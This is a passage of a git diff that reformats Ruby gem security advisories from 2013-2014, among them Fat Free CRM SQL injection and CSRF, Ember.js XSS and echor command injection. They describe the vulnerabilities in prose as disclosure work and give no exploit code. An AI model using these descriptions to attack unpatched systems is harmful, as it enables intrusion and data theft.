+  date: 2013-12-14
+  description: |
+    Nokogiri gem 1.5.x has Denial of Service via infinite loop when parsing
+    XML documents
+  cvss_v2: 4.3
+  cvss_v3: 6.5
+  patched_versions:
+  - "~> 1.5.11"
+  - ">= 1.6.1"
+---
diff --git a/advisories/_posts/2013-12-14-CVE-2013-6461.md b/advisories/_posts/2013-12-14-CVE-2013-6461.md
index 07f32e30..da45874f 100644
--- a/advisories/_posts/2013-12-14-CVE-2013-6461.md
+++ b/advisories/_posts/2013-12-14-CVE-2013-6461.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2013-6461 (nokogiri): CVE-2013-6461 rubygem-nokogiri: DoS while parsing
-  XML entities'
-comments: false
-categories:
-- nokogiri
-advisory:
-  gem: nokogiri
-  cve: 2013-6461
-  osvdb: 101458
-  ghsa: jmhh-w7xp-wg39
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-6461
-  title: 'CVE-2013-6461 rubygem-nokogiri: DoS while parsing XML entities'
-  date: 2013-12-14
-  description: |
-    Nokogiri gem 1.5.x and 1.6.x has DoS while parsing XML entities by failing
-    to apply limits
-  cvss_v3: 6.5
-  patched_versions:
-  - "~> 1.5.11"
-  - ">= 1.6.1"
----
+---
+layout: advisory
+title: 'CVE-2013-6461 (nokogiri): CVE-2013-6461 rubygem-nokogiri: DoS while parsing
+  XML entities'
+comments: false
+categories:
+- nokogiri
+advisory:
+  gem: nokogiri
+  cve: 2013-6461
+  osvdb: 101458
+  ghsa: jmhh-w7xp-wg39
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-6461
+  title: 'CVE-2013-6461 rubygem-nokogiri: DoS while parsing XML entities'
+  date: 2013-12-14
+  description: |
+    Nokogiri gem 1.5.x and 1.6.x has DoS while parsing XML entities by failing
+    to apply limits
+  cvss_v3: 6.5
+  patched_versions:
+  - "~> 1.5.11"
+  - ">= 1.6.1"
+---
diff --git a/advisories/_posts/2013-12-14-CVE-2013-7111.md b/advisories/_posts/2013-12-14-CVE-2013-7111.md
index 924817b4..129ee101 100644
--- a/advisories/_posts/2013-12-14-CVE-2013-7111.md
+++ b/advisories/_posts/2013-12-14-CVE-2013-7111.md
@@ -1,20 +1,20 @@
----
-layout: advisory
-title: 'CVE-2013-7111 (bio-basespace-sdk): Bio Basespace SDK Gem for Ruby Command
-  Line API Key Disclosure'
-comments: false
-categories:
-- bio-basespace-sdk
-advisory:
-  gem: bio-basespace-sdk
-  cve: 2013-7111
-  osvdb: 101031
-  ghsa: xwr3-fmgj-mmfr
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-7111
-  title: Bio Basespace SDK Gem for Ruby Command Line API Key Disclosure
-  date: 2013-12-14
-  description: |
-    Bio Basespace SDK Gem for Ruby contains a flaw that is due to the API
-    client code passing the API_KEY to a curl command. This may allow a local attacker
-    to gain access to API key information by monitoring the process table.
----
+---
+layout: advisory
+title: 'CVE-2013-7111 (bio-basespace-sdk): Bio Basespace SDK Gem for Ruby Command
+  Line API Key Disclosure'
+comments: false
+categories:
+- bio-basespace-sdk
+advisory:
+  gem: bio-basespace-sdk
+  cve: 2013-7111
+  osvdb: 101031
+  ghsa: xwr3-fmgj-mmfr
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-7111
+  title: Bio Basespace SDK Gem for Ruby Command Line API Key Disclosure
+  date: 2013-12-14
+  description: |
+    Bio Basespace SDK Gem for Ruby contains a flaw that is due to the API
+    client code passing the API_KEY to a curl command. This may allow a local attacker
+    to gain access to API key information by monitoring the process table.
+---
diff --git a/advisories/_posts/2013-12-24-CVE-2013-7222.md b/advisories/_posts/2013-12-24-CVE-2013-7222.md
index fd1116f5..fa9ec744 100644
--- a/advisories/_posts/2013-12-24-CVE-2013-7222.md
+++ b/advisories/_posts/2013-12-24-CVE-2013-7222.md
@@ -1,25 +1,25 @@
----
-layout: advisory
-title: 'CVE-2013-7222 (fat_free_crm): Fat Free CRM Gem for Ruby lack of support for
-  cycling the Rails session secret'
-comments: false
-categories:
-- fat_free_crm
-advisory:
-  gem: fat_free_crm
-  cve: 2013-7222
-  osvdb: 101445
-  ghsa: g897-cgfc-7q8v
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-7222
-  title: Fat Free CRM Gem for Ruby lack of support for cycling the Rails session secret
-  date: 2013-12-24
-  description: |
-    Fat Free CRM contains a flaw that is due to the application defining a static
-    security session token in config/initialiers/secret_token.rb. If a remote
-    attacker has explicit knowledge of this token, they can potentially execute
-    arbitrary code.
-  cvss_v2: 5.0
-  patched_versions:
-  - ">= 0.13.0"
-  - "~> 0.12.1"
----
+---
+layout: advisory
+title: 'CVE-2013-7222 (fat_free_crm): Fat Free CRM Gem for Ruby lack of support for
+  cycling the Rails session secret'
+comments: false
+categories:
+- fat_free_crm
+advisory:
+  gem: fat_free_crm
+  cve: 2013-7222
+  osvdb: 101445
+  ghsa: g897-cgfc-7q8v
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-7222
+  title: Fat Free CRM Gem for Ruby lack of support for cycling the Rails session secret
+  date: 2013-12-24
+  description: |
+    Fat Free CRM contains a flaw that is due to the application defining a static
+    security session token in config/initialiers/secret_token.rb. If a remote
+    attacker has explicit knowledge of this token, they can potentially execute
+    arbitrary code.
+  cvss_v2: 5.0
+  patched_versions:
+  - ">= 0.13.0"
+  - "~> 0.12.1"
+---
diff --git a/advisories/_posts/2013-12-24-CVE-2013-7223.md b/advisories/_posts/2013-12-24-CVE-2013-7223.md
index b7ecdb8a..a4f3dc15 100644
--- a/advisories/_posts/2013-12-24-CVE-2013-7223.md
+++ b/advisories/_posts/2013-12-24-CVE-2013-7223.md
@@ -1,28 +1,28 @@
----
-layout: advisory
-title: 'CVE-2013-7223 (fat_free_crm): Fat Free CRM Gem for Ruby contains multiple
-  cross-site request forgery (CSRF) vulnerabilities'
-comments: false
-categories:
-- fat_free_crm
-advisory:
-  gem: fat_free_crm
-  cve: 2013-7223
-  osvdb: 101446
-  ghsa: mcvq-7xjq-46x6
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-7223
-  title: Fat Free CRM Gem for Ruby contains multiple cross-site request forgery (CSRF)
-    vulnerabilities
-  date: 2013-12-24
-  description: |
-    Fat Free CRM contains a flaw as the application is missing the protect_from_forgery
-    statement, therefore HTTP requests to app/controllers/application_controller.rb
-    do not require multiple steps, explicit confirmation, or a unique token when
-    performing certain sensitive actions. By tricking a user into following a specially
-    crafted link, a context-dependent attacker can perform a Cross-Site Request Forgery
-    (CSRF / XSRF) attack causing the victim to perform unspecified actions.
-  cvss_v2: 6.8
-  patched_versions:
-  - ">= 0.13.0"
-  - "~> 0.12.1"
----
+---
+layout: advisory
+title: 'CVE-2013-7223 (fat_free_crm): Fat Free CRM Gem for Ruby contains multiple
+  cross-site request forgery (CSRF) vulnerabilities'
+comments: false
+categories:
+- fat_free_crm
+advisory:
+  gem: fat_free_crm
+  cve: 2013-7223
+  osvdb: 101446
+  ghsa: mcvq-7xjq-46x6
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-7223
+  title: Fat Free CRM Gem for Ruby contains multiple cross-site request forgery (CSRF)
+    vulnerabilities
+  date: 2013-12-24
+  description: |
+    Fat Free CRM contains a flaw as the application is missing the protect_from_forgery
+    statement, therefore HTTP requests to app/controllers/application_controller.rb
+    do not require multiple steps, explicit confirmation, or a unique token when
+    performing certain sensitive actions. By tricking a user into following a specially
+    crafted link, a context-dependent attacker can perform a Cross-Site Request Forgery
+    (CSRF / XSRF) attack causing the victim to perform unspecified actions.
+  cvss_v2: 6.8
+  patched_versions:
+  - ">= 0.13.0"
+  - "~> 0.12.1"
+---
diff --git a/advisories/_posts/2013-12-24-CVE-2013-7224.md b/advisories/_posts/2013-12-24-CVE-2013-7224.md
index 89ae76b6..5d81aded 100644
--- a/advisories/_posts/2013-12-24-CVE-2013-7224.md
+++ b/advisories/_posts/2013-12-24-CVE-2013-7224.md
@@ -1,25 +1,25 @@
----
-layout: advisory
-title: 'CVE-2013-7224 (fat_free_crm): Fat Free CRM Gem for Ruby allows remote attackers
-  to obtain sensitive informations'
-comments: false
-categories:
-- fat_free_crm
-advisory:
-  gem: fat_free_crm
-  cve: 2013-7224
-  osvdb: 101447
-  ghsa: 4xq9-vw89-p5cx
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-7224
-  title: Fat Free CRM Gem for Ruby allows remote attackers to obtain sensitive informations
-  date: 2013-12-24
-  description: |
-    Fat Free CRM contains a flaw in user controllers that is triggered as JSON
-    requests are rendered with a full JSON object. This may allow a remote
-    attacker to gain access to potentially sensitive information e.g. other
-    users password hashes.
-  cvss_v2: 5.0
-  patched_versions:
-  - ">= 0.13.0"
-  - "~> 0.12.1"
----
+---
+layout: advisory
+title: 'CVE-2013-7224 (fat_free_crm): Fat Free CRM Gem for Ruby allows remote attackers
+  to obtain sensitive informations'
+comments: false
+categories:
+- fat_free_crm
+advisory:
+  gem: fat_free_crm
+  cve: 2013-7224
+  osvdb: 101447
+  ghsa: 4xq9-vw89-p5cx
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-7224
+  title: Fat Free CRM Gem for Ruby allows remote attackers to obtain sensitive informations
+  date: 2013-12-24
+  description: |
+    Fat Free CRM contains a flaw in user controllers that is triggered as JSON
+    requests are rendered with a full JSON object. This may allow a remote
+    attacker to gain access to potentially sensitive information e.g. other
+    users password hashes.
+  cvss_v2: 5.0
+  patched_versions:
+  - ">= 0.13.0"
+  - "~> 0.12.1"
+---
diff --git a/advisories/_posts/2013-12-24-CVE-2013-7225.md b/advisories/_posts/2013-12-24-CVE-2013-7225.md
index bf963590..0ce2b06e 100644
--- a/advisories/_posts/2013-12-24-CVE-2013-7225.md
+++ b/advisories/_posts/2013-12-24-CVE-2013-7225.md
@@ -1,28 +1,28 @@
----
-layout: advisory
-title: 'CVE-2013-7225 (fat_free_crm): Fat Free CRM Gem for Ruby allows remote attackers
-  to inject or manipulate SQL queries'
-comments: false
-categories:
-- fat_free_crm
-advisory:
-  gem: fat_free_crm
-  cve: 2013-7225
-  osvdb: 101448
-  ghsa: 9ggp-5rf4-x7q9
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-7225
-  title: Fat Free CRM Gem for Ruby allows remote attackers to inject or manipulate
-    SQL queries
-  date: 2013-12-24
-  description: |
-    Fat Free CRM contains a flaw that may allow carrying out an SQL injection
-    attack. The issue is due to the app/controllers/home_controller.rb script
-    not properly sanitizing user-supplied input to the 'state' parameter or
-    input passed via comments and emails. This may allow a remote attacker to
-    inject or manipulate SQL queries in the back-end database, allowing for
-    the manipulation or disclosure of arbitrary data.
-  cvss_v2: 6.5
-  patched_versions:
-  - ">= 0.13.0"
-  - "~> 0.12.1"
----
+---
+layout: advisory
+title: 'CVE-2013-7225 (fat_free_crm): Fat Free CRM Gem for Ruby allows remote attackers
+  to inject or manipulate SQL queries'
+comments: false
+categories:
+- fat_free_crm
+advisory:
+  gem: fat_free_crm
+  cve: 2013-7225
+  osvdb: 101448
+  ghsa: 9ggp-5rf4-x7q9
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-7225
+  title: Fat Free CRM Gem for Ruby allows remote attackers to inject or manipulate
+    SQL queries
+  date: 2013-12-24
+  description: |
+    Fat Free CRM contains a flaw that may allow carrying out an SQL injection
+    attack. The issue is due to the app/controllers/home_controller.rb script
+    not properly sanitizing user-supplied input to the 'state' parameter or
+    input passed via comments and emails. This may allow a remote attacker to
+    inject or manipulate SQL queries in the back-end database, allowing for
+    the manipulation or disclosure of arbitrary data.
+  cvss_v2: 6.5
+  patched_versions:
+  - ">= 0.13.0"
+  - "~> 0.12.1"
+---
diff --git a/advisories/_posts/2013-12-24-CVE-2013-7249.md b/advisories/_posts/2013-12-24-CVE-2013-7249.md
index d5e964e6..f1d6aaa9 100644
--- a/advisories/_posts/2013-12-24-CVE-2013-7249.md
+++ b/advisories/_posts/2013-12-24-CVE-2013-7249.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'CVE-2013-7249 (fat_free_crm): Fat Free CRM Gem for Ruby allows remote attackers
-  to obtain sensitive informations'
-comments: false
-categories:
-- fat_free_crm
-advisory:
-  gem: fat_free_crm
-  cve: 2013-7249
-  osvdb: 101700
-  ghsa: f25h-3mj6-4jpg
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-7249
-  title: Fat Free CRM Gem for Ruby allows remote attackers to obtain sensitive informations
-  date: 2013-12-24
-  description: |
-    Fat Free CRM contains a flaw that is triggered when the attacker sends a
-    direct request for XML data. This may allow a remote attacker to gain
-    access to potentially sensitive information.
-  cvss_v2: 5.0
-  patched_versions:
-  - ">= 0.13.0"
-  - "~> 0.12.1"
----
+---
+layout: advisory
+title: 'CVE-2013-7249 (fat_free_crm): Fat Free CRM Gem for Ruby allows remote attackers
+  to obtain sensitive informations'
+comments: false
+categories:
+- fat_free_crm
+advisory:
+  gem: fat_free_crm
+  cve: 2013-7249
+  osvdb: 101700
+  ghsa: f25h-3mj6-4jpg
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-7249
+  title: Fat Free CRM Gem for Ruby allows remote attackers to obtain sensitive informations
+  date: 2013-12-24
+  description: |
+    Fat Free CRM contains a flaw that is triggered when the attacker sends a
+    direct request for XML data. This may allow a remote attacker to gain
+    access to potentially sensitive information.
+  cvss_v2: 5.0
+  patched_versions:
+  - ">= 0.13.0"
+  - "~> 0.12.1"
+---
diff --git a/advisories/_posts/2013-12-26-CVE-2014-1233.md b/advisories/_posts/2013-12-26-CVE-2014-1233.md
index 8e6278da..b1ae321b 100644
--- a/advisories/_posts/2013-12-26-CVE-2014-1233.md
+++ b/advisories/_posts/2013-12-26-CVE-2014-1233.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2014-1233 (paratrooper-pingdom): paratrooper-pingdom Gem for Ruby /lib/paratrooper-pingdom.rb
-  API Login Credentials Local Disclosure'
-comments: false
-categories:
-- paratrooper-pingdom
-advisory:
-  gem: paratrooper-pingdom
-  cve: 2014-1233
-  osvdb: 101847
-  ghsa: fqrr-rrwg-69pv
-  url: https://nvd.nist.gov/vuln/detail/CVE-2014-1233
-  title: paratrooper-pingdom Gem for Ruby /lib/paratrooper-pingdom.rb API Login Credentials
-    Local Disclosure
-  date: 2013-12-26
-  description: |
-    paratrooper-pingdom Gem for Ruby contains a flaw in
-    /lib/paratrooper-pingdom.rb. The issue is triggered when the script exposes
-    API login credentials, allowing a local attacker to gain access to the API
-    key, username, and password for the API login by monitoring the process tree.
-  cvss_v2: 2.1
----
+---
+layout: advisory
+title: 'CVE-2014-1233 (paratrooper-pingdom): paratrooper-pingdom Gem for Ruby /lib/paratrooper-pingdom.rb
+  API Login Credentials Local Disclosure'
+comments: false
+categories:
+- paratrooper-pingdom
+advisory:
+  gem: paratrooper-pingdom
+  cve: 2014-1233
+  osvdb: 101847
+  ghsa: fqrr-rrwg-69pv
+  url: https://nvd.nist.gov/vuln/detail/CVE-2014-1233
+  title: paratrooper-pingdom Gem for Ruby /lib/paratrooper-pingdom.rb API Login Credentials
+    Local Disclosure
+  date: 2013-12-26
+  description: |
+    paratrooper-pingdom Gem for Ruby contains a flaw in
+    /lib/paratrooper-pingdom.rb. The issue is triggered when the script exposes
+    API login credentials, allowing a local attacker to gain access to the API
+    key, username, and password for the API login by monitoring the process tree.
+  cvss_v2: 2.1
+---
diff --git a/advisories/_posts/2013-12-31-OSVDB-101577.md b/advisories/_posts/2013-12-31-OSVDB-101577.md
index 8e3e73b1..e37726ad 100644
--- a/advisories/_posts/2013-12-31-OSVDB-101577.md
+++ b/advisories/_posts/2013-12-31-OSVDB-101577.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'OSVDB-101577 (flukso4r): flukso4r Gem for Ruby /lib/flukso/R.rb Arbitrary
-  Command Execution'
-comments: false
-categories:
-- flukso4r
-advisory:
-  gem: flukso4r
-  osvdb: 101577
-  url: https://vulners.com/seebug/SSV:61267
-  title: flukso4r Gem for Ruby /lib/flukso/R.rb Arbitrary Command Execution
-  date: 2013-12-31
-  description: |
-    flukso4r Gem for Ruby contains a flaw in /lib/flukso/R.rb that is due
-    to the application failing to properly validate user-supplied input. This may allow
-    a context-dependent attacker to execute arbitrary commands.
-  notes: No patched version
-  related:
-    url:
-    - https://security.snyk.io/vuln/SNYK-RUBY-FLUKSO4R-20136
-    - https://vulners.com/seebug/SSV:61267
-    - http://osvdb.org/show/osvdb/101577
----
+---
+layout: advisory
+title: 'OSVDB-101577 (flukso4r): flukso4r Gem for Ruby /lib/flukso/R.rb Arbitrary
+  Command Execution'
+comments: false
+categories:
+- flukso4r
+advisory:
+  gem: flukso4r
+  osvdb: 101577
+  url: https://vulners.com/seebug/SSV:61267
+  title: flukso4r Gem for Ruby /lib/flukso/R.rb Arbitrary Command Execution
+  date: 2013-12-31
+  description: |
+    flukso4r Gem for Ruby contains a flaw in /lib/flukso/R.rb that is due
+    to the application failing to properly validate user-supplied input. This may allow
+    a context-dependent attacker to execute arbitrary commands.
+  notes: No patched version
+  related:
+    url:
+    - https://security.snyk.io/vuln/SNYK-RUBY-FLUKSO4R-20136
+    - https://vulners.com/seebug/SSV:61267
+    - http://osvdb.org/show/osvdb/101577
+---
diff --git a/advisories/_posts/2014-01-08-CVE-2014-1234.md b/advisories/_posts/2014-01-08-CVE-2014-1234.md
index a08d1314..9bece973 100644
--- a/advisories/_posts/2014-01-08-CVE-2014-1234.md
+++ b/advisories/_posts/2014-01-08-CVE-2014-1234.md
@@ -1,22 +1,22 @@
----
-layout: advisory
-title: 'CVE-2014-1234 (paratrooper-newrelic): Paratrooper-newrelic Gem for Ruby Process
-  Listing API Key Local Disclosure'
-comments: false
-categories:
-- paratrooper-newrelic
-advisory:
-  gem: paratrooper-newrelic
-  cve: 2014-1234
-  osvdb: 101839
-  ghsa: 959j-5g9v-3fpq
-  url: https://nvd.nist.gov/vuln/detail/CVE-2014-1234
-  title: Paratrooper-newrelic Gem for Ruby Process Listing API Key Local Disclosure
-  date: 2014-01-08
-  description: |
-    Paratrooper-newrelic Gem for Ruby contains a flaw in
-    /lib/paratrooper-newrelic.rb. The issue is triggered when the script exposes
-    the API key, allowing a local attacker to gain access to it by monitoring the
-    process tree.
-  cvss_v2: 2.1
----
+---
+layout: advisory
+title: 'CVE-2014-1234 (paratrooper-newrelic): Paratrooper-newrelic Gem for Ruby Process
+  Listing API Key Local Disclosure'
+comments: false
+categories:
+- paratrooper-newrelic
+advisory:
+  gem: paratrooper-newrelic
+  cve: 2014-1234
+  osvdb: 101839
+  ghsa: 959j-5g9v-3fpq
+  url: https://nvd.nist.gov/vuln/detail/CVE-2014-1234
+  title: Paratrooper-newrelic Gem for Ruby Process Listing API Key Local Disclosure
+  date: 2014-01-08
+  description: |
+    Paratrooper-newrelic Gem for Ruby contains a flaw in
+    /lib/paratrooper-newrelic.rb. The issue is triggered when the script exposes
+    the API key, allowing a local attacker to gain access to it by monitoring the
+    process tree.
+  cvss_v2: 2.1
+---
diff --git a/advisories/_posts/2014-01-14-CVE-2014-0013.md b/advisories/_posts/2014-01-14-CVE-2014-0013.md
index a7a727c0..bfd4a3f1 100644
--- a/advisories/_posts/2014-01-14-CVE-2014-0013.md
+++ b/advisories/_posts/2014-01-14-CVE-2014-0013.md
@@ -1,42 +1,42 @@
----
-layout: advisory
-title: 'CVE-2014-0013 (ember-source): Ember.js Potential XSS Exploit With User-Supplied
-  Data When Binding Primitive Values'
-comments: false
-categories:
-- ember-source
-advisory:
-  gem: ember-source
-  cve: 2014-0013
-  ghsa: 8xm3-gm7c-5fjx
-  url: https://groups.google.com/forum/#!topic/ember-security/2kpXXCxISS4
-  title: Ember.js Potential XSS Exploit With User-Supplied Data When Binding Primitive
-    Values
-  date: 2014-01-14
-  description: |
-    In general, Ember.js escapes or strips any user-supplied content before
-    inserting it in strings that will be sent to innerHTML.  However, we have
-    identified a vulnerability that could lead to unescaped content being inserted
-    into the innerHTML string without being sanitized.
-
-    When a primitive value is used as the Handlebars context, that value is not
-    properly escaped.  An example of this would be using the `{{each}}` helper to
-    iterate over an array of user-supplied strings and using `{{this}}` inside the
-    block to display each string.
-
-    In applications that contain templates whose context is a primitive value and
-    use the `{{this}}` keyword to display that value, a specially-crafted payload
-    could execute arbitrary JavaScript in the context of the current domain
-    ("XSS").
-
-    This vulnerability affects applications that contain templates whose context is
-    set to a user-supplied primitive value (such as a string or number) and also
-    contain the `{{this}}` special Handlebars variable to display the value.
-  cvss_v3: 5.4
-  patched_versions:
-  - "~> 1.0.1"
-  - "~> 1.1.3"
-  - "~> 1.2.1"
-  - "~> 1.3.1"
-  - ">= 1.4.0.beta.2"
----
+---
+layout: advisory
+title: 'CVE-2014-0013 (ember-source): Ember.js Potential XSS Exploit With User-Supplied
+  Data When Binding Primitive Values'
+comments: false
+categories:
+- ember-source
+advisory:
+  gem: ember-source
+  cve: 2014-0013
+  ghsa: 8xm3-gm7c-5fjx
+  url: https://groups.google.com/forum/#!topic/ember-security/2kpXXCxISS4
+  title: Ember.js Potential XSS Exploit With User-Supplied Data When Binding Primitive
+    Values
+  date: 2014-01-14
+  description: |
+    In general, Ember.js escapes or strips any user-supplied content before
+    inserting it in strings that will be sent to innerHTML.  However, we have
+    identified a vulnerability that could lead to unescaped content being inserted
+    into the innerHTML string without being sanitized.
+
+    When a primitive value is used as the Handlebars context, that value is not
+    properly escaped.  An example of this would be using the `{{each}}` helper to
+    iterate over an array of user-supplied strings and using `{{this}}` inside the
+    block to display each string.
+
+    In applications that contain templates whose context is a primitive value and
+    use the `{{this}}` keyword to display that value, a specially-crafted payload
+    could execute arbitrary JavaScript in the context of the current domain
+    ("XSS").
+
+    This vulnerability affects applications that contain templates whose context is
+    set to a user-supplied primitive value (such as a string or number) and also
+    contain the `{{this}}` special Handlebars variable to display the value.
+  cvss_v3: 5.4
+  patched_versions:
+  - "~> 1.0.1"
+  - "~> 1.1.3"
+  - "~> 1.2.1"
+  - "~> 1.3.1"
+  - ">= 1.4.0.beta.2"
+---
diff --git a/advisories/_posts/2014-01-14-CVE-2014-0014.md b/advisories/_posts/2014-01-14-CVE-2014-0014.md
index ea829af0..c090ebae 100644
--- a/advisories/_posts/2014-01-14-CVE-2014-0014.md
+++ b/advisories/_posts/2014-01-14-CVE-2014-0014.md
@@ -1,39 +1,39 @@
----
-layout: advisory
-title: 'CVE-2014-0014 (ember-source): Ember.js Potential XSS Exploit With User-Supplied
-  Data When Using {{group}} Helper'
-comments: false
-categories:
-- ember-source
-advisory:
-  gem: ember-source
-  cve: 2014-0014
-  ghsa: rcx6-7jp6-pqf2
-  url: https://groups.google.com/forum/#!topic/ember-security/PSE4RzTi6l4
-  title: Ember.js Potential XSS Exploit With User-Supplied Data When Using {{group}}
-    Helper
-  date: 2014-01-14
-  description: |
-    In general, Ember.js escapes or strips any user-supplied content before
-    inserting it in strings that will be sent to innerHTML.  However, we have
-    identified a vulnerability that could lead to unescaped content being inserted
-    into the innerHTML string without being sanitized.
-
-    When using the `{{group}}` helper, user supplied content in the template was not
-    being sanitized. Though the vulnerability exists in Ember.js proper, it is only
-    exposed via the use of an experimental plugin.
-
-    In applications that use the `{{group}}` helper, a specially-crafted payload
-    could execute arbitrary JavaScript in the context of the current domain
-    ("XSS").
-
-    This vulnerability only affects applications that use the `{{group}}` helper
-    to display user-provided content.
-  cvss_v3: 5.4
-  patched_versions:
-  - "~> 1.0.1"
-  - "~> 1.1.3"
-  - "~> 1.2.1"
-  - "~> 1.3.1"
-  - ">= 1.4.0.beta.2"
----
+---
+layout: advisory
+title: 'CVE-2014-0014 (ember-source): Ember.js Potential XSS Exploit With User-Supplied
+  Data When Using {{group}} Helper'
+comments: false
+categories:
+- ember-source
+advisory:
+  gem: ember-source
+  cve: 2014-0014
+  ghsa: rcx6-7jp6-pqf2
+  url: https://groups.google.com/forum/#!topic/ember-security/PSE4RzTi6l4
+  title: Ember.js Potential XSS Exploit With User-Supplied Data When Using {{group}}
+    Helper
+  date: 2014-01-14
+  description: |
+    In general, Ember.js escapes or strips any user-supplied content before
+    inserting it in strings that will be sent to innerHTML.  However, we have
+    identified a vulnerability that could lead to unescaped content being inserted
+    into the innerHTML string without being sanitized.
+
+    When using the `{{group}}` helper, user supplied content in the template was not
+    being sanitized. Though the vulnerability exists in Ember.js proper, it is only
+    exposed via the use of an experimental plugin.
+
+    In applications that use the `{{group}}` helper, a specially-crafted payload
+    could execute arbitrary JavaScript in the context of the current domain
+    ("XSS").
+
+    This vulnerability only affects applications that use the `{{group}}` helper
+    to display user-provided content.
+  cvss_v3: 5.4
+  patched_versions:
+  - "~> 1.0.1"
+  - "~> 1.1.3"
+  - "~> 1.2.1"
+  - "~> 1.3.1"
+  - ">= 1.4.0.beta.2"
+---
diff --git a/advisories/_posts/2014-01-14-CVE-2014-1834.md b/advisories/_posts/2014-01-14-CVE-2014-1834.md
index aacf51fa..0be93bc7 100644
--- a/advisories/_posts/2014-01-14-CVE-2014-1834.md
+++ b/advisories/_posts/2014-01-14-CVE-2014-1834.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2014-1834 (echor): echor Gem for Ruby backplane.rb perform_request Function
-  Arbitrary Command Execution'
-comments: false
-categories:
-- echor
-advisory:
-  gem: echor
-  cve: 2014-1834
-  osvdb: 102129
-  ghsa: 8936-cgj4-phr2
-  url: https://nvd.nist.gov/vuln/detail/CVE-2014-1834
-  title: echor Gem for Ruby backplane.rb perform_request Function Arbitrary Command
-    Execution
-  date: 2014-01-14
-  description: |
-    Echor Gem for Ruby contains a flaw in backplane.rb in the perform_request
-    function that is triggered when a semi-colon (;) is injected into a username
-    or password. This may allow a context-dependent attacker to inject arbitrary
-    commands if the gem is used in a rails application.
-  cvss_v3: 7.8
----
+---
+layout: advisory
+title: 'CVE-2014-1834 (echor): echor Gem for Ruby backplane.rb perform_request Function
+  Arbitrary Command Execution'
+comments: false
+categories:
+- echor
+advisory:
+  gem: echor
+  cve: 2014-1834
+  osvdb: 102129
+  ghsa: 8936-cgj4-phr2
+  url: https://nvd.nist.gov/vuln/detail/CVE-2014-1834
+  title: echor Gem for Ruby backplane.rb perform_request Function Arbitrary Command
+    Execution
+  date: 2014-01-14
+  description: |
+    Echor Gem for Ruby contains a flaw in backplane.rb in the perform_request
+    function that is triggered when a semi-colon (;) is injected into a username
+    or password. This may allow a context-dependent attacker to inject arbitrary
+    commands if the gem is used in a rails application.
+  cvss_v3: 7.8
+---
diff --git a/advisories/_posts/2014-01-14-CVE-2014-1835.md b/advisories/_posts/2014-01-14-CVE-2014-1835.md
index 11b31718..1c0524f0 100644
--- a/advisories/_posts/2014-01-14-CVE-2014-1835.md
+++ b/advisories/_posts/2014-01-14-CVE-2014-1835.md
@@ -1,21 +1,21 @@
----
-layout: advisory
-title: 'CVE-2014-1835 (echor): echor Gem for Ruby Process Listing Local Plaintext
-  Credential Disclosure'
-comments: false
-categories:
-- echor
-advisory:
-  gem: echor
-  cve: 2014-1835
-  osvdb: 102130
-  ghsa: j4gx-p3x5-m987
-  url: https://nvd.nist.gov/vuln/detail/CVE-2014-1835
-  title: echor Gem for Ruby Process Listing Local Plaintext Credential Disclosure
-  date: 2014-01-14
-  description: |
-    echor Gem for Ruby contains a flaw that is due to the program exposing
-    credential information in the system process listing. This may allow a local
-    attacker to gain access to plaintext credential information.
-  cvss_v3: 7.8
----
+---
+layout: advisory
+title: 'CVE-2014-1835 (echor): echor Gem for Ruby Process Listing Local Plaintext
+  Credential Disclosure'
+comments: false
+categories:
+- echor
+advisory:
+  gem: echor
+  cve: 2014-1835
+  osvdb: 102130
+  ghsa: j4gx-p3x5-m987
+  url: https://nvd.nist.gov/vuln/detail/CVE-2014-1835
+  title: echor Gem for Ruby Process Listing Local Plaintext Credential Disclosure
+  date: 2014-01-14
+  description: |
+    echor Gem for Ruby contains a flaw that is due to the program exposing
+    credential information in the system process listing. This may allow a local
+    attacker to gain access to plaintext credential information.
+  cvss_v3: 7.8
+---
diff --git a/advisories/_posts/2014-01-28-CVE-2014-1831.md b/advisories/_posts/2014-01-28-CVE-2014-1831.md
index f97713df..c0f02ec1 100644
--- a/advisories/_posts/2014-01-28-CVE-2014-1831.md
+++ b/advisories/_posts/2014-01-28-CVE-2014-1831.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'CVE-2014-1831 (passenger): CVE-2014-1831 CVE-2014-1832 rubygem-passenger:
-  insecure use of temporary files'
-comments: false
-categories:
-- passenger
-advisory:
-  gem: passenger
-  cve: 2014-1831
-  osvdb: 102613
-  ghsa: c7j7-p5jq-26ff
-  url: https://nvd.nist.gov/vuln/detail/CVE-2014-1831
-  title: 'CVE-2014-1831 CVE-2014-1832 rubygem-passenger: insecure use of temporary
-    files'
-  date: 2014-01-28
-  description: |
-    Phusion Passenger before 4.0.37 allows local users to write to certain
-    files and directories via a symlink attack on (1) control_process.pid or a (2) generation-*
-    file.
-  cvss_v2: 2.1
-  patched_versions:
-  - ">= 4.0.37"
----
+---
+layout: advisory
+title: 'CVE-2014-1831 (passenger): CVE-2014-1831 CVE-2014-1832 rubygem-passenger:
+  insecure use of temporary files'
+comments: false
+categories:
+- passenger
+advisory:
+  gem: passenger
+  cve: 2014-1831
+  osvdb: 102613
+  ghsa: c7j7-p5jq-26ff
+  url: https://nvd.nist.gov/vuln/detail/CVE-2014-1831
+  title: 'CVE-2014-1831 CVE-2014-1832 rubygem-passenger: insecure use of temporary
+    files'
+  date: 2014-01-28
+  description: |
+    Phusion Passenger before 4.0.37 allows local users to write to certain
+    files and directories via a symlink attack on (1) control_process.pid or a (2) generation-*
+    file.
+  cvss_v2: 2.1
+  patched_versions:
